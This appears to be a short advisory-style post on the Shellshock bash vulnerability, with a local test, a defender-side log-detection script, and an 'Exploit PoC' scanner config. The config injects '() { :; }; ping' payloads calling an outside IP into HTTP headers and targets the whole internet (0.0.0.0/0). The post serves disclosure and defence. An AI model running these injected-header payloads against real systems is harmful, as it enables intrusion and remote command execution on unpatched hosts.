The newest contender for the title of biggest vulnerability ever discovered. An introduction to it:
What assets are vulnerable?
Bash shells – in other words, all assets running Unix/Linux operating systems. This includes servers, networking devices, firewalls and appliance boxes.
Which versions of Bash are affected?
Everything up to and including version 4.3, which means about 25 years’ worth of versions!
When was this publicly announced?
On Wednesday the 24th, around noon (GMT).
This means all the bad guys out there have had the attack code since then. The longer we wait to defend ourselves, the more likely we are to become a victim.
Mitigating Controls:
One option is simply to disable any CGI functionality that makes calls to a shell, and indeed some are recommending this. In many cases, though, that is going to be a seriously breaking change and, at the very least, one that is going to require extensive testing to ensure it doesn’t cause immediate problems.
How to check if my asset is vulnerable?
There’s a very simple test, which is just running this command in your shell (it must be run against bash itself; on systems where /bin/sh is a different shell, such as dash, pointing the test at /bin/sh gives a false negative):
env X="() { :;} ; echo busted" /bin/bash -c "echo stuff"
If you get “busted” echoed back out, you’ve successfully exploited the bug.
Exploit PoC?
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74 *
http-header = Host:() { :; }; ping -c 3 209.126.230.74 *
http-header = Referer:() { :; }; ping -c 3 209.126.230.74 *
* Essentially this asks the vulnerable assets to ping the attacker. This is what a white-hat (non-malicious) attacker would do; a bad guy would code in something much more sinister.
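The vulnerability check above and the header-based scan traffic in the PoC, turned into two defender-side checks as an added example (this is not code from the original post): one function runs the env-variable test against a chosen bash binary and reports its status, the other counts access-log lines carrying the "() {" marker that the scan plants in request headers. The log lines are constructed for the example; the path to bash and the log format (Apache combined) are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes POSIX sh, env and grep.

# 1. Is the bash on this host still vulnerable to the trailing-command bug?
#    Runs the post's env-variable test against the bash given as $1
#    (default: the "bash" found on PATH). Prints "vulnerable", "patched"
#    or "no-bash". The injected trailing command only echoes a word.
shellshock_status() {
    bash_bin="${1:-$(command -v bash 2>/dev/null || true)}"
    [ -n "$bash_bin" ] && [ -x "$bash_bin" ] || { echo "no-bash"; return 0; }
    out=$(env X='() { :;}; echo busted' "$bash_bin" -c 'echo stuff' 2>/dev/null || true)
    case "$out" in
        *busted*) echo "vulnerable" ;;   # bash ran the text after the function body
        *)        echo "patched" ;;      # only "stuff" came back
    esac
}

# 2. Detection: the PoC config puts "() {" into Cookie, Host and Referer
#    headers; in the combined log format the Referer and User-Agent fields
#    are where such probes become visible. Constructed sample log lines:
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; ping -c 3 198.51.100.9"
203.0.113.6 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1043 "http://example.test/" "Mozilla/5.0"
203.0.113.7 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :; }; ping -c 3 198.51.100.9" "shellshock-scan"'

# Count matching lines. grep -F treats the pattern literally, so the
# parentheses and brace are not interpreted as a regular expression.
shellshock_log_hits() {
    printf '%s\n' "$SAMPLE_LOG" | grep -Fc '() {' || true
}

# Print the matching lines so the source addresses can be triaged.
shellshock_log_lines() {
    printf '%s\n' "$SAMPLE_LOG" | grep -F '() {' || true
}
```

To run the log check against a real file, replace the printf of SAMPLE_LOG with a redirect from the access log.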